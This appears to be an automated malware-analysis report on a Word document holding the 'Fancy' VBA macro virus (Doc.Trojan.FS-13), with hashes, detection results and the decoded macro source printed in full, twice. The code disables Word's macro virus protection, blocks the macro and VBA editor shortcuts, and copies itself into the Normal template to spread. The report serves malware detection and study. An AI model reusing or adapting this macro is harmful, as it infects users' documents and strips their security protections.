Office (OLE) malware analysis — malicious · cace05b028129453

MALICIOUS

Office (OLE)

27.5 KB Created: 1999-08-04 07:44:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: de59f3b92db60e8415977949239674ef SHA-1: 09397bbb8d0bd0de1f895c08b8b25b867b8e7b48 SHA-256: cace05b0281294532b405e4b810f9bd0f565eb01317d73f017d7cafa6280c5ab

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macro code attempts to disable macro security warnings and export its own code to a file named .SHS in the application directory. This behavior suggests an attempt to establish persistence or facilitate the execution of additional malicious code.

Heuristics 2

ClamAV: Doc.Trojan.FS-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-13
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1273 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1273 bytes
SHA-256: `14a0146ca7b9cba575719610e487f40ba788e55d105e19a3d1cb2028966edaa1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Fancy" 'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy Sub DocClose(): Const ι = "Fancy" On Error Resume Next Options.VirusProtection = &H0 Options.SaveNormalPrompt = &H0 Options.ConfirmConversions = &H0 Application.EnableCancelKey = &H0 If ActiveDocument.Path = "" Then GoTo 0 CommandBars("Tools").Controls(12).Visible = &H0 KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" " KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" " If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS" If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS" If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS" 0 ActiveDocument.Close: End Sub Sub FileClose(): DocClose: End Sub

SHA-256: 14a0146ca7b9cba575719610e487f40ba788e55d105e19a3d1cb2028966edaa1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fancy"
'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy
Sub DocClose(): Const ι = "Fancy"
On Error Resume Next
Options.VirusProtection = &H0
Options.SaveNormalPrompt = &H0
Options.ConfirmConversions = &H0
Application.EnableCancelKey = &H0
If ActiveDocument.Path = "" Then GoTo 0
CommandBars("Tools").Controls(12).Visible = &H0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS"
If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS"
If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS"
0 ActiveDocument.Close: End Sub
Sub FileClose(): DocClose: End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.